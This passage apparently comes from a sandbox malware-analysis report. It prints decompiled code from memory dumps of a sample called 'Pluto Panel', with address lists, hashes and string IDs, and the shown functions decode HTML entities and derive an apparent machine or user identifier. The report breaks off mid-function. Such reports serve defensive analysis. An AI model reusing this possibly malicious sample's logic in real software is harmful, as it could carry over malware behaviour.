				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr* _t200;
				char* _t202;
				signed int _t203;
				intOrPtr _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				char _t215;
				intOrPtr _t216;
				short _t219;
				signed int _t224;
				intOrPtr* _t225;
				intOrPtr _t230;
				intOrPtr* _t231;
				intOrPtr* _t233;
				intOrPtr* _t238;
				signed int _t239;
				signed int _t242;
				intOrPtr _t243;
				intOrPtr* _t244;
				signed int _t245;
				void* _t247;
				void* _t248;
				void* _t249;

				_v64 = 0x413f68;
				_v60 = 0x413f70;
				_v56 = 0x413f74;
				_v52 = 0x413f78;
				_v48 = 0x413f80;
				_v44 = 0x413f88;
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = 0x413f90;
				_v464 = 0x413f98;
				_v460 = 0x413fa0;
				_v456 = 0x413fa8;
				_v452 = 0x413fb0;
				_v448 = 0x413fb8;
				_v444 = 0x413fc0;
				_v440 = 0x413fc8;
				_v436 = 0x413fd0;
				_v432 = 0x413fd8;
				_v428 = 0x413fe0;
				_v424 = 0x413fe8;
				_v420 = 0x413ff0;
				_v416 = 0x413ff8;
				_v412 = 0x414000;
				_v408 = 0x414008;
				_v404 = 0x414010;
				_v400 = 0x414018;
				_v396 = 0x414020;
				_v392 = 0x414028;
				_v388 = 0x414030;
				_v384 = 0x414038;
				_v380 = 0x414040;
				_v376 = 0x414048;
				_v372 = 0x414050;
				_v368 = 0x414058;
				_v364 = 0x414060;
				_v360 = 0x414068;
				_v356 = 0x414070;
				_v352 = 0x414078;
				_v348 = 0x414080;
				_v344 = 0x414088;
				_v340 = 0x414090;
				_v336 = 0x414098;
				_v332 = 0x4140a0;
				_v328 = 0x4140a8;
				_v324 = 0x4140b0;
				_v320 = 0x4140b8;
				_v316 = 0x4140c0;
				_v312 = 0x4140c8;
				_v308 = 0x4140d0;
				_v304 = 0x4140d8;
				_v300 = 0x4140e0;
				_v296 = 0x4140e8;
				_v292 = 0x4140f0;
				_v288 = 0x4140f8;
				_v284 = 0x414100;
				_v280 = 0x414108;
				_v276 = 0x414110;
				_v272 = 0x414118;
				_v268 = 0x414120;
				_v264 = 0x414128;
				_v260 = 0x414130;
				_v256 = 0x414138;
				_v252 = 0x414140;
				_v248 = 0x414148;
				_v244 = 0x414150;
				_v240 = 0x414158;
				_v236 = 0x414160;
				_v232 = 0x414168;
				_v228 = 0x414170;
				_v224 = 0x414178;
				_v220 = 0x414180;
				_v216 = 0x414188;
				_v212 = 0x414190;
				_v208 = 0x414198;
				_v204 = 0x4141a0;
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t224 = 0;
				_t247 = 0;
				_v200 = 0x4141a8;
				_v196 = 0x4141b0;
				_v192 = 0x4141b8;
				_v188 = 0x4141c0;
				_v184 = 0x4141c8;
				_v180 = 0x4141d0;
				_v176 = 0x4141d8;
				_v172 = 0x4141e0;
				_v168 = 0x4141e8;
				_v164 = 0x4141f0;
				_v160 = 0x4141f8;
				_v156 = 0x414200;
				_v152 = 0x414208;
				_v148 = 0x414210;
				_v144 = 0x414218;
				_v140 = 0x414220;
				_v136 = 0x414228;
				_v132 = 0x414230;
				_v128 = 0x414238;
				_v124 = 0x414240;
				_v120 = 0x414248;
				_v116 = 0x414250;
				_v112 = 0x414258;
				_v108 = 0x414260;
				_v104 = 0x414268;
				_v100 = 0x414270;
				_v96 = 0x414278;
				_v92 = 0x414280;
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t224;
					 *_t202 = 0;
					if(_a20 == 0 || _t224 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t247) {
					_t225 = _t247 + _t200;
					_t203 =  *_t225;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t224 + _a4)) = _t203;
							_t224 = _t224 + 1;
						} else {
							if(_t224 != _v28) {
								 *((char*)(_t224 + _a4)) = 0x20;
								_t224 = _t224 + 1;
								if(_a20 != 0 && _t224 == 1) {
									_t224 = 0;
								}
							}
							_v28 = _t224;
						}
						_t247 = _t247 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t247 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t242 = 0;
					_v36 = _t225 + 1;
					while(1) {
						_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
						L00F803B6();
						_push(_t203);
						_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
						_v8 = _t203;
						_push(_v36);
						L00F804AE();
						_t249 = _t249 + 0x10;
						if(_t203 == 0) {
							break;
						}
						_t242 = _t242 + 1;
						if(_t242 < 6) {
							continue;
						}
						_t207 = _a8;
						if( *((char*)(_t247 + _t207 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t209 =  *((intOrPtr*)(_t248 + _v8 * 4 - 0x1d0));
								_push(_t209);
								_v40 = _t209;
								L00F803B6();
								_t243 = _t209;
								_push(_t243);
								_push(_v40);
								_push(_v36);
								L00F804AE();
								_t249 = _t249 + 0x10;
								if(_t209 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t224 + _a4)) = _v8 - 0x5f;
							_t224 = _t224 + 1;
							_t247 = _t247 + _t243 + 1;
							goto L43;
						}
						_t128 = _t207 + 2; // 0x2
						_t244 = _t247 + _t128;
						_t230 =  *_t244;
						if(_t230 == 0x78 || _t230 == 0x58) {
							_t159 = _t207 + 3; // 0x3
							_t238 = _t247 + _t159;
							_t231 = _t238;
							_t245 = 0;
							while(1) {
								_t212 =  *_t231;
								if(_t212 == 0) {
									break;
								}
								if(_t212 == 0x3b) {
									L27:
									if(_t245 <= 0) {
										goto L29;
									}
									_push(_t245);
									_push(_t238);
									_push( &_v88);
									L00F8043C();
									 *((char*)(_t248 + _t245 - 0x54)) = 0;
									_t215 = E00F75384( &_v88,  &_v88);
									_t249 = _t249 + 0x10;
									 *((char*)(_t224 + _a4)) = _t215;
									_t224 = _t224 + 1;
									_t247 = _t247 + _t245 + 4;
									goto L43;
								}
								_t245 = _t245 + 1;
								if(_t245 >= 4) {
									break;
								}
								_t231 = _t231 + 1;
							}
							_t245 = _t245 | 0xffffffff;
							goto L27;
						} else {
							_t233 = _t244;
							_t239 = 0;
							while(1) {
								_t216 =  *_t233;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									_v8 = _t239;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									L00F8043C();
									 *((char*)(_t248 + _v8 - 0x48)) = 0;
									_t219 =  &_v76;
									L00F80430();
									_t249 = _t249 + 0x10;
									_v32 = _t219;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									 *0x4120d4(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0, _t219,  &_v76, _t244, _v8);
									 *((char*)(_t224 + _a4)) = _v12;
									_t224 = _t224 + 1;
									_t247 = _t247 + _v8 + 3;
									goto L43;
								}
								_t239 = _t239 + 1;
								if(_t239 >= 6) {
									break;
								}
								_t233 = _t233 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t224 + _a4)) =  *((intOrPtr*)(_t248 + _t242 - 0x14));
					_t224 = _t224 + 1;
					_t247 = _t247 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}
















































































































































                                                                                                          0x00f7e685
                                                                                                          0x00f7e68c
                                                                                                          0x00f7e693
                                                                                                          0x00f7e69a
                                                                                                          0x00f7e6a1
                                                                                                          0x00f7e6a8
                                                                                                          0x00f7e6af
                                                                                                          0x00f7e6b3
                                                                                                          0x00f7e6b7
                                                                                                          0x00f7e6bb
                                                                                                          0x00f7e6bf
                                                                                                          0x00f7e6c3
                                                                                                          0x00f7e6c7
                                                                                                          0x00f7e6d1
                                                                                                          0x00f7e6db
                                                                                                          0x00f7e6e5
                                                                                                          0x00f7e6ef
                                                                                                          0x00f7e6f9
                                                                                                          0x00f7e703
                                                                                                          0x00f7e70d
                                                                                                          0x00f7e717
                                                                                                          0x00f7e721
                                                                                                          0x00f7e72b
                                                                                                          0x00f7e735
                                                                                                          0x00f7e73f
                                                                                                          0x00f7e749
                                                                                                          0x00f7e753
                                                                                                          0x00f7e75d
                                                                                                          0x00f7e767
                                                                                                          0x00f7e771
                                                                                                          0x00f7e77b
                                                                                                          0x00f7e785
                                                                                                          0x00f7e78f
                                                                                                          0x00f7e799
                                                                                                          0x00f7e7a3
                                                                                                          0x00f7e7ad
                                                                                                          0x00f7e7b7
                                                                                                          0x00f7e7c1
                                                                                                          0x00f7e7cb
                                                                                                          0x00f7e7d5
                                                                                                          0x00f7e7df
                                                                                                          0x00f7e7e9
                                                                                                          0x00f7e7f3
                                                                                                          0x00f7e7fd
                                                                                                          0x00f7e807
                                                                                                          0x00f7e811
                                                                                                          0x00f7e81b
                                                                                                          0x00f7e825
                                                                                                          0x00f7e82f
                                                                                                          0x00f7e839
                                                                                                          0x00f7e843
                                                                                                          0x00f7e84d
                                                                                                          0x00f7e857
                                                                                                          0x00f7e861
                                                                                                          0x00f7e86b
                                                                                                          0x00f7e875
                                                                                                          0x00f7e87f
                                                                                                          0x00f7e889
                                                                                                          0x00f7e893
                                                                                                          0x00f7e89d
                                                                                                          0x00f7e8a7
                                                                                                          0x00f7e8b1
                                                                                                          0x00f7e8bb
                                                                                                          0x00f7e8c5
                                                                                                          0x00f7e8cf
                                                                                                          0x00f7e8d9
                                                                                                          0x00f7e8e3
                                                                                                          0x00f7e8ed
                                                                                                          0x00f7e8f7
                                                                                                          0x00f7e901
                                                                                                          0x00f7e90b
                                                                                                          0x00f7e915
                                                                                                          0x00f7e91f
                                                                                                          0x00f7e929
                                                                                                          0x00f7e933
                                                                                                          0x00f7e93d
                                                                                                          0x00f7e947
                                                                                                          0x00f7e951
                                                                                                          0x00f7e95b
                                                                                                          0x00f7e965
                                                                                                          0x00f7e968
                                                                                                          0x00f7e96c
                                                                                                          0x00f7e96e
                                                                                                          0x00f7e972
                                                                                                          0x00f7e97c
                                                                                                          0x00f7e986
                                                                                                          0x00f7e990
                                                                                                          0x00f7e99a
                                                                                                          0x00f7e9a4
                                                                                                          0x00f7e9ae
                                                                                                          0x00f7e9b8
                                                                                                          0x00f7e9c2
                                                                                                          0x00f7e9cc
                                                                                                          0x00f7e9d6
                                                                                                          0x00f7e9e0
                                                                                                          0x00f7e9ea
                                                                                                          0x00f7e9f4
                                                                                                          0x00f7e9fe
                                                                                                          0x00f7ea08
                                                                                                          0x00f7ea12
                                                                                                          0x00f7ea1c
                                                                                                          0x00f7ea23
                                                                                                          0x00f7ea2a
                                                                                                          0x00f7ea31
                                                                                                          0x00f7ea38
                                                                                                          0x00f7ea3f
                                                                                                          0x00f7ea46
                                                                                                          0x00f7ea4d
                                                                                                          0x00f7ea54
                                                                                                          0x00f7ea5b
                                                                                                          0x00f7ea62
                                                                                                          0x00f7ea69
                                                                                                          0x00f7ec57
                                                                                                          0x00f7ec5a
                                                                                                          0x00f7ec60
                                                                                                          0x00f7ec63
                                                                                                          0x00f7ec76
                                                                                                          0x00f7ec6f
                                                                                                          0x00f7ec6f
                                                                                                          0x00000000
                                                                                                          0x00f7ec6f
                                                                                                          0x00f7ec63
                                                                                                          0x00f7ea70
                                                                                                          0x00f7ea7f
                                                                                                          0x00f7ea82
                                                                                                          0x00f7ea86
                                                                                                          0x00f7ea89
                                                                                                          0x00f7ec06
                                                                                                          0x00f7ec0a
                                                                                                          0x00f7ec44
                                                                                                          0x00f7ec47
                                                                                                          0x00f7ec10
                                                                                                          0x00f7ec13
                                                                                                          0x00f7ec18
                                                                                                          0x00f7ec1c
                                                                                                          0x00f7ec21
                                                                                                          0x00f7ec28
                                                                                                          0x00f7ec28
                                                                                                          0x00f7ec21
                                                                                                          0x00f7ec2a
                                                                                                          0x00f7ec2a
                                                                                                          0x00f7ec48
                                                                                                          0x00f7ec49
                                                                                                          0x00f7ec49
                                                                                                          0x00f7ec50
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7ec50
                                                                                                          0x00f7ea8f
                                                                                                          0x00f7ea92
                                                                                                          0x00f7ea95
                                                                                                          0x00f7ea95
                                                                                                          0x00f7ea99
                                                                                                          0x00f7ea9e
                                                                                                          0x00f7ea9f
                                                                                                          0x00f7eaa3
                                                                                                          0x00f7eaa6
                                                                                                          0x00f7eaa9
                                                                                                          0x00f7eaae
                                                                                                          0x00f7eab3
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eab5
                                                                                                          0x00f7eab9
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eabb
                                                                                                          0x00f7eac3
                                                                                                          0x00f7ebce
                                                                                                          0x00f7ebce
                                                                                                          0x00f7ebd2
                                                                                                          0x00f7ebd5
                                                                                                          0x00f7ebdc
                                                                                                          0x00f7ebdd
                                                                                                          0x00f7ebe0
                                                                                                          0x00f7ebe5
                                                                                                          0x00f7ebe7
                                                                                                          0x00f7ebe8
                                                                                                          0x00f7ebeb
                                                                                                          0x00f7ebee
                                                                                                          0x00f7ebf3
                                                                                                          0x00f7ebf8
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7ebfa
                                                                                                          0x00f7ec01
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7ec03
                                                                                                          0x00000000
                                                                                                          0x00f7ec03
                                                                                                          0x00f7ec37
                                                                                                          0x00f7ec3a
                                                                                                          0x00f7ec3b
                                                                                                          0x00000000
                                                                                                          0x00f7ec3b
                                                                                                          0x00f7eac9
                                                                                                          0x00f7eac9
                                                                                                          0x00f7eacd
                                                                                                          0x00f7ead2
                                                                                                          0x00f7eb83
                                                                                                          0x00f7eb83
                                                                                                          0x00f7eb87
                                                                                                          0x00f7eb89
                                                                                                          0x00f7eb98
                                                                                                          0x00f7eb98
                                                                                                          0x00f7eb9c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eb8f
                                                                                                          0x00f7eba1
                                                                                                          0x00f7eba3
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eba5
                                                                                                          0x00f7eba6
                                                                                                          0x00f7ebaa
                                                                                                          0x00f7ebab
                                                                                                          0x00f7ebb4
                                                                                                          0x00f7ebb9
                                                                                                          0x00f7ebc1
                                                                                                          0x00f7ebc4
                                                                                                          0x00f7ebc7
                                                                                                          0x00f7ebc8
                                                                                                          0x00000000
                                                                                                          0x00f7ebc8
                                                                                                          0x00f7eb91
                                                                                                          0x00f7eb95
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eb97
                                                                                                          0x00f7eb97
                                                                                                          0x00f7eb9e
                                                                                                          0x00000000
                                                                                                          0x00f7eae1
                                                                                                          0x00f7eae1
                                                                                                          0x00f7eae3
                                                                                                          0x00f7eb09
                                                                                                          0x00f7eb09
                                                                                                          0x00f7eb0d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eb00
                                                                                                          0x00f7eb7e
                                                                                                          0x00f7eb13
                                                                                                          0x00f7eb17
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eb25
                                                                                                          0x00f7eb2d
                                                                                                          0x00f7eb32
                                                                                                          0x00f7eb36
                                                                                                          0x00f7eb3b
                                                                                                          0x00f7eb46
                                                                                                          0x00f7eb55
                                                                                                          0x00f7eb5d
                                                                                                          0x00f7eb5e
                                                                                                          0x00f7eb62
                                                                                                          0x00f7eb6e
                                                                                                          0x00f7eb74
                                                                                                          0x00f7eb75
                                                                                                          0x00000000
                                                                                                          0x00f7eb75
                                                                                                          0x00f7eb02
                                                                                                          0x00f7eb06
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f7eb08
                                                                                                          0x00f7eb08
                                                                                                          0x00f7eb0f
                                                                                                          0x00000000
                                                                                                          0x00f7eb0f
                                                                                                          0x00f7ead2
                                                                                                          0x00f7eaee
                                                                                                          0x00f7eaf4
                                                                                                          0x00f7eaf5
                                                                                                          0x00000000
                                                                                                          0x00f7eaf5
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @A$ AA$ BA$(@A$(AA$(BA$0@A$0AA$0BA$8@A$8AA$8BA$@@A$@AA$@BA$H@A$HAA$HBA$P@A$PAA$PBA$X@A$XAA$XBA$`@A$`AA$`BA$h?A$h@A$hAA$hBA$p?A$p@A$pAA$pBA$t?A$x?A$x@A$xAA$xBA$?A$?A$@A$@A$AA$AA
                                                                                                          • API String ID: 0-2473593039
                                                                                                          • Opcode ID: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                                                          • Instruction ID: eecf81e627f2af7111bbfa1a82eadee9153d894015daf30dcb4595cf117ce4a9
                                                                                                          • Opcode Fuzzy Hash: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                                                          • Instruction Fuzzy Hash: 22F144B0C002599EDB21CF94D8487DEBFB0AB9A318F54C1CAD5583B241C7B90AC9DF99
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00F71478 Relevance: 10.1, Strings: 8, Instructions: 127COMMON
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 21%
                                                                                                          			E00F71478(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t57;
				void* _t58;
				void* _t65;
				void* _t68;
				void* _t71;
				void* _t84;
				signed int _t87;
				void* _t89;
				signed int _t93;
				intOrPtr _t97;
				intOrPtr _t98;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t111;

				_t111 = __fp0;
				_t89 = __ecx;
				_t100 = _t102 - 0x6c;
				_t103 = _t102 - 0x474;
				 *((intOrPtr*)(_t100 + 0x4c)) = 0x4125f8;
				 *((intOrPtr*)(_t100 + 0x50)) = 0x412608;
				 *((intOrPtr*)(_t100 + 0x54)) = 0x412618;
				 *((intOrPtr*)(_t100 + 0x58)) = 0x41262c;
				 *((intOrPtr*)(_t100 + 0x1c)) = 0x41263c;
				 *((intOrPtr*)(_t100 + 0x20)) = 0x412648;
				 *((intOrPtr*)(_t100 + 0x24)) = 0x412654;
				 *((intOrPtr*)(_t100 + 0x28)) = 0x412664;
				 *((intOrPtr*)(_t100 + 0x3c)) = 0x412670;
				 *((intOrPtr*)(_t100 + 0x40)) = 0x412680;
				 *((intOrPtr*)(_t100 + 0x44)) = 0x412690;
				 *((intOrPtr*)(_t100 + 0x48)) = 0x4126a4;
				 *((intOrPtr*)(_t100 + 0x2c)) = 0x4126b4;
				 *((intOrPtr*)(_t100 + 0x30)) = 0x4126c0;
				 *((intOrPtr*)(_t100 + 0x34)) = 0x4126cc;
				 *((intOrPtr*)(_t100 + 0x38)) = 0x4126dc;
				 *((intOrPtr*)(_t100 + 0x5c)) = 0x4126e8;
				 *((intOrPtr*)(_t100 + 0x60)) = 0x412700;
				 *((intOrPtr*)(_t100 + 0x64)) = 0x412718;
				 *((intOrPtr*)(_t100 + 0x68)) = 0x412734;
				_t87 = 0;
				do {
					_push(0x7f);
					_push(0);
					_push(_t100 - 0x63);
					 *((char*)(_t100 - 0x64)) = 0;
					L00F803F4();
					_push(_t100 - 0x64);
					_t93 = _t87 << 2;
					_push( *((intOrPtr*)(_t100 + _t93 + 0x4c)));
					_push( *((intOrPtr*)(_t100 + 0x78)));
					_t57 = 0x7f;
					_t58 = E00F7D9F2(_t57, _t89);
					_t103 = _t103 + 0x18;
					if(_t58 == 0) {
						E00F7104A(_t100 - 0x408);
						_push(_t100 - 0x64);
						_push(_t100 - 0x1f4);
						L00F803FA();
						_t97 =  *((intOrPtr*)(_t100 + 0x78));
						 *((intOrPtr*)(_t100 - 0x37c)) =  *((intOrPtr*)(_t100 + 0x7c));
						_t34 = _t87 + 1; // 0x1
						 *((intOrPtr*)(_t100 - 0x1f8)) = _t34;
						_push(_t100 - 0x2f8);
						_push( *((intOrPtr*)(_t100 + _t93 + 0x1c)));
						_push(_t97);
						_t65 = 0x7f;
						E00F7D9F2(_t65, _t89);
						_push(_t100 - 0x3fc);
						_push(0x41274c);
						_push(_t97);
						_t68 = 0x7f;
						E00F7D9F2(_t68, _t89);
						_push(_t100 - 0x378);
						_push(0x412760);
						_push(_t97);
						_t71 = 0x7f;
						E00F7D9F2(_t71, _t89);
						_t105 = _t103 + 0x2c;
						if(_t87 != 3) {
							_push(_t100 - 0x278);
							_push(0x412664);
							_push(_t97);
							_t84 = 0x7f;
							E00F7D9F2(_t84, _t89);
							_t105 = _t105 + 0xc;
						}
						E00F7D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x2c)), _t100 - 0x74);
						E00F7D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x5c)), _t100 - 0x70);
						_t103 = _t105 + 0x18;
						_t98 =  *((intOrPtr*)(_t100 + 0x74));
						E00F712DE(_t98, _t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x3c)), _t100 - 0x174, 0);
						_push(_t98 + 0xa9c);
						_push(_t100 - 0xf4);
						L00F803FA();
						_pop(_t89);
						_t58 = E00F71279(_t100 - 0x408, _t111, _t98);
					}
					_t87 = _t87 + 1;
				} while (_t87 < 4);
				return _t58;
			}




















                                                                                                          0x00f71478
                                                                                                          0x00f71478
                                                                                                          0x00f71479
                                                                                                          0x00f7147d
                                                                                                          0x00f71486
                                                                                                          0x00f7148d
                                                                                                          0x00f71494
                                                                                                          0x00f7149b
                                                                                                          0x00f714a2
                                                                                                          0x00f714a9
                                                                                                          0x00f714b0
                                                                                                          0x00f714b7
                                                                                                          0x00f714be
                                                                                                          0x00f714c5
                                                                                                          0x00f714cc
                                                                                                          0x00f714d3
                                                                                                          0x00f714da
                                                                                                          0x00f714e1
                                                                                                          0x00f714e8
                                                                                                          0x00f714ef
                                                                                                          0x00f714f6
                                                                                                          0x00f714fd
                                                                                                          0x00f71504
                                                                                                          0x00f7150b
                                                                                                          0x00f71512
                                                                                                          0x00f71514
                                                                                                          0x00f71514
                                                                                                          0x00f71519
                                                                                                          0x00f7151b
                                                                                                          0x00f7151c
                                                                                                          0x00f71520
                                                                                                          0x00f71528
                                                                                                          0x00f7152b
                                                                                                          0x00f7152e
                                                                                                          0x00f71532
                                                                                                          0x00f71537
                                                                                                          0x00f71538
                                                                                                          0x00f7153d
                                                                                                          0x00f71542
                                                                                                          0x00f7154e
                                                                                                          0x00f71556
                                                                                                          0x00f7155d
                                                                                                          0x00f7155e
                                                                                                          0x00f71566
                                                                                                          0x00f71569
                                                                                                          0x00f7156f
                                                                                                          0x00f71572
                                                                                                          0x00f7157e
                                                                                                          0x00f7157f
                                                                                                          0x00f71583
                                                                                                          0x00f71586
                                                                                                          0x00f71587
                                                                                                          0x00f71592
                                                                                                          0x00f71593
                                                                                                          0x00f71598
                                                                                                          0x00f7159b
                                                                                                          0x00f7159c
                                                                                                          0x00f715a7
                                                                                                          0x00f715a8
                                                                                                          0x00f715ad
                                                                                                          0x00f715b0
                                                                                                          0x00f715b1
                                                                                                          0x00f715b6
                                                                                                          0x00f715bc
                                                                                                          0x00f715c4
                                                                                                          0x00f715c5
                                                                                                          0x00f715ca
                                                                                                          0x00f715cd
                                                                                                          0x00f715ce
                                                                                                          0x00f715d3
                                                                                                          0x00f715d3
                                                                                                          0x00f715df
                                                                                                          0x00f715ed
                                                                                                          0x00f715f2
                                                                                                          0x00f71603
                                                                                                          0x00f71608
                                                                                                          0x00f71613
                                                                                                          0x00f7161a
                                                                                                          0x00f7161b
                                                                                                          0x00f71621
                                                                                                          0x00f71629
                                                                                                          0x00f71629
                                                                                                          0x00f7162e
                                                                                                          0x00f7162f
                                                                                                          0x00f7163f

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,&A$4'A$<&A$H&A$T&A$d&A$p&A$&A
                                                                                                          • API String ID: 0-3237638986
                                                                                                          • Opcode ID: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                                                          • Instruction ID: ae8d4cecc56871c7ff5c996911cb6fde34f9537649d3f1063ee081ee9ae98bb9
                                                                                                          • Opcode Fuzzy Hash: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                                                          • Instruction Fuzzy Hash: A44173B190021CABDB20DF90CD45ADE3BB8EF14304F508566FA1CD7151D7B89A98CF95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00F760BE Relevance: 8.9, Strings: 7, Instructions: 143COMMON
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 45%
                                                                                                          			E00F760BE(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v291;
				char _v292;
				char _v547;
				char _v548;
				char _v1058;
				char _v1060;
				char _v1570;
				char _v1572;
				char* _t81;
				char* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				signed int _t97;
				intOrPtr* _t102;
				signed short* _t103;
				intOrPtr _t106;
				void* _t107;

				_t85 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				L00F803F4();
				_v548 = 0;
				L00F803F4();
				_v1572 = 0;
				L00F803F4();
				_v1060 = 0;
				L00F803F4();
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				 *0x412090( &_v292,  &_v24,  &_v1058, 0, 0x1fe,  &_v1570, 0, 0x1fe,  &_v547, 0, 0xff,  &_v291, 0, 0xff);
				_v24 = 0xff;
				 *0x412018( &_v548,  &_v24);
				_t102 =  *0x4120d0;
				 *_t102(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				 *_t102(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_t81 =  &_v292;
				_push(_t81);
				L00F803B6();
				_v32 = _t81;
				_t82 =  &_v548;
				_push(_t82);
				L00F803B6();
				_t106 = _v36;
				_v28 = _t82;
				_push(0x10);
				_push( &_v20);
				_push(_t106);
				L00F8043C();
				_t84 = 0xba0da71d;
				if(_v28 > 0) {
					_t103 =  &_v1060;
					do {
						_t97 = _a4 & 0x80000003;
						if(_t97 < 0) {
							_t97 = (_t97 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t89 = ( *_t103 & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t97 * 4) =  *(_t106 + _t97 * 4) ^ _t89;
						_a4 = _a4 + 1;
						_t103 =  &(_t103[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t85) {
					do {
						_t92 = _a4 & 0x80000003;
						if(_t92 < 0) {
							_t92 = (_t92 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t87 = ( *(_t107 + _t85 * 2 - 0x620) & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
